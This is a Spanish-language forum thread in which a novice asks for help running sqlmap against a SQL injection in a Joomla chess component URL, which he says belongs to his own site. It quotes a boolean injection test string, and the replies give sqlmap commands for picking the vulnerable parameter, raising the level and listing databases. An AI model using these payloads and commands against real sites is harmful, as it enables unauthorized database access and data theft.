Hola,
Amigos, quisiera que me hecharan una mano con esto, Soy un poco novatillo :P por lo que quiero adentrarme más en la inyeccion de sitios.
Descubrí una Vulnerabilidad en mi Apache 2.2, y estoy parchando mi sitio.
/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
(Ojo no se cunfundan es una cadena, no dos.)
Y bueno, al tratar el parametro en sqlmap me arroja un error que el parametro option no es inyectable.
Y la verdad no se como inyectar algunos parametros. En ellos esta el de option. :-(
Bueno, amigos espero que respondan gracias ;D
cuales son los comandos? la vulnerabilidad como es por el link no tienes que colocar nada, solo el link vulnerable sin modificar nada.
Bueno, amigo gracias por comentar, crei que nadie comentaria, estoy parchando mi Apache /2.2 y el comando es este:
index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
Y me arroja un error desde el principio pero me lo ejecuta como caulquier otro, nunca habia visto algo así. Y al final me lo rechaza y me arroja el error de nuevo. :|
El comando que ejecuto: sqlmap -u www.miblog.com/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
me arroja un error de que es inestable y me da opciones que si deseo continuar presione C y si no q. Le doy C y me ejecuta el error
Cita de: Owl-City en 29 Enero 2014, 03:52 AM
Bueno, amigo gracias por comentar, crei que nadie comentaria, estoy parchando mi Apache /2.2 y el comando es este:
index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
Y me arroja un error desde el principio pero me lo ejecuta como caulquier otro, nunca habia visto algo así. Y al final me lo rechaza y me arroja el error de nuevo. :|
El comando que ejecuto: sqlmap -u www.miblog.com/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
me arroja un error de que es inestable y me da opciones que si deseo continuar presione C y si no q. Le doy C y me ejecuta el error
no tienes que colocar todo ese link en sqlmap, el comando debe parecerse a esto:
sqlmap -u www.miblog.com/index.php?option=com --dbssaludos, hasta mañana.
Aveces la URL requiere de varios parametros y solamente uno de ellos es vulnerable. Para esos casos existe -p.
Ejemplo:
sqlmap -u "www.miblog.com/index.php?option=com_pcchess&Itemid=84" -p "option" --current-db
Si te dice que no es vulnerable quizas quieras elevar el nivel.
sqlmap -u "www.miblog.com/index.php?option=com_pcchess&Itemid=84" -p "option" --current-db --level 3
Level puede ser de 1 a 5. También esta risk que es de 1 a 3. Para mas info simplemente pon sqlmap --hh
Saludos
Ho disculpen un error, si uso --dbs. :-[ :P, pero muchas gracias lo provaré.
bueno, yaa los probé y me salé que el parametro no es inyectable. :|
pero tomé en cuenta lo siguiente:
[23:08:10] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
No entiendo muy bien a lo que se refiere. Pues soy un poco nuevo en esta aplicacion automática.
Te recomiendo que aprendas toda la teoría relacionada con esta inyección antes de ponerte a usar programas de terceros, porque luego pasan éstas cosas.
Explotala manualmente, y cuando sepas hacerlo, usar sqlmap será más sencillo
Yo tengo un servidor casero donde hago mis pruebas con php y mysql.
¿Que herramienta has utilizado para saber que tu codigo tiene vulnerabilidades?
Gracias.
Cita de: OssoH en 5 Febrero 2014, 18:02 PM
Yo tengo un servidor casero donde hago mis pruebas con php y mysql.
¿Que herramienta has utilizado para saber que tu codigo tiene vulnerabilidades?
Gracias.
El tiempo y el ingenio xD